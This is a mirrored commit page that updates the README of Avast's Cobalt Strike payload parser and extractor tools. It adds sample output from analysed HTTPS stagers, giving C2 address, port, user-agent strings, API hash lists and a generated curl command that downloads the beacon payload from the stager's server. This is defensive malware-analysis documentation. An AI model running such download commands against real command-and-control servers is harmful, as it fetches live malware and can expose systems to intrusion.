Mirrors
/
ioc-collection
mirror of https://github.com/avast/ioc
6
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update README.md

This commit is contained in:
avast-ti 2021-07-08 15:07:55 +02:00 committed by GitHub
parent 04da1e3ad9
commit edfa1c5f3c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 93 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

94
CobaltStrike/payload_tools/README.md
View File

@ -14,6 +14,46 @@ Example:
cs_payload_parser.py memdump.bin
cs_payload_parser.py c:\cs_payloads\
```
Output:
```
<filename>.log
```
```
--------------------------------------------------------------------------------
Filename: fhttps_raw_x86
--------------------------------------------------------------------------------
Architecture: x86
Payload type: HTTPS stager
Payload start: 0x0000
Customer ID: 0x12345678 | 305419896
--------------------------------------------------------------------------------
Request detail:
Address: 192.168.42.2
Port: 444
Query: /AYhZ (Beacon_x86 checksum)
--------------------------------------------------------------------------------
Request header:
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;PTBR)
--------------------------------------------------------------------------------
Curl download command:
curl -o beacon_x86.bin -H "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;PTBR)" https://192.168.42.2:444/AYhZ
--------------------------------------------------------------------------------
Payload API list:
Offset | Hash value | API name
0x009c | 0x0726774c | kernel32.dll_LoadLibraryA
0x00af | 0xa779563a | wininet.dll_InternetOpenA
0x00cb | 0xc69f8957 | wininet.dll_InternetConnectA
0x00e7 | 0x3b2e55eb | wininet.dll_HttpOpenRequestA
0x0100 | 0x869e4675 | wininet.dll_InternetSetOptionA
0x0110 | 0x7b18062d | wininet.dll_HttpSendRequestA
0x0129 | 0x5de2c5aa | kernel32.dll_GetLastError
0x0132 | 0x315e2145 | user32.dll_GetDesktopWindow
0x0141 | 0x0be057b7 | wininet.dll_InternetErrorDlg
0x02e9 | 0x56a2b5f0 | kernel32.dll_ExitProcess
0x02fd | 0xe553a458 | kernel32.dll_VirtualAlloc
0x0318 | 0xe2899612 | wininet.dll_InternetReadFile
--------------------------------------------------------------------------------
```
## cs_payload_extractor.py
@ -27,4 +67,56 @@ Example:
```
cs_payload_extractor.py memdump.bin
cs_payload_extractor.py c:\cs_payloads\
```
```
Output:
```
<filename>_payload.bin
<filename>_payload.bin.log
```
```
--------------------------------------------------------------------------------
CS Payload extractor v1.00 Avast Software s.r.o
--------------------------------------------------------------------------------
[*] Extracting file..
--------------------------------------------------------------------------------
Filename: fhttps_exe_x86
Payload type: xored_payload
--------------------------------------------------------------------------------
Saved as: fhttps_exe_x86_payload.bin
--------------------------------------------------------------------------------
[*] Parsing file..
--------------------------------------------------------------------------------
Filename: fhttps_exe_x86_payload.bin
--------------------------------------------------------------------------------
Architecture: x86
Payload type: HTTPS stager
Payload start: 0x0000
Customer ID: 0x12345678 | 305419896
--------------------------------------------------------------------------------
Request detail:
Address: 192.168.42.2
Port: 444
Query: /IZVc (Beacon_x86 checksum)
--------------------------------------------------------------------------------
Request header:
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MASP)
--------------------------------------------------------------------------------
Curl download command:
curl -o beacon_x86.bin -H "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MASP)" https://192.168.42.2:444/IZVc
--------------------------------------------------------------------------------
Payload API list:
Offset | Hash value | API name
0x009c | 0x0726774c | kernel32.dll_LoadLibraryA
0x00af | 0xa779563a | wininet.dll_InternetOpenA
0x00cb | 0xc69f8957 | wininet.dll_InternetConnectA
0x00e7 | 0x3b2e55eb | wininet.dll_HttpOpenRequestA
0x0100 | 0x869e4675 | wininet.dll_InternetSetOptionA
0x0110 | 0x7b18062d | wininet.dll_HttpSendRequestA
0x0129 | 0x5de2c5aa | kernel32.dll_GetLastError
0x0132 | 0x315e2145 | user32.dll_GetDesktopWindow
0x0141 | 0x0be057b7 | wininet.dll_InternetErrorDlg
0x02e9 | 0x56a2b5f0 | kernel32.dll_ExitProcess
0x02fd | 0xe553a458 | kernel32.dll_VirtualAlloc
0x0318 | 0xe2899612 | wininet.dll_InternetReadFile
--------------------------------------------------------------------------------
```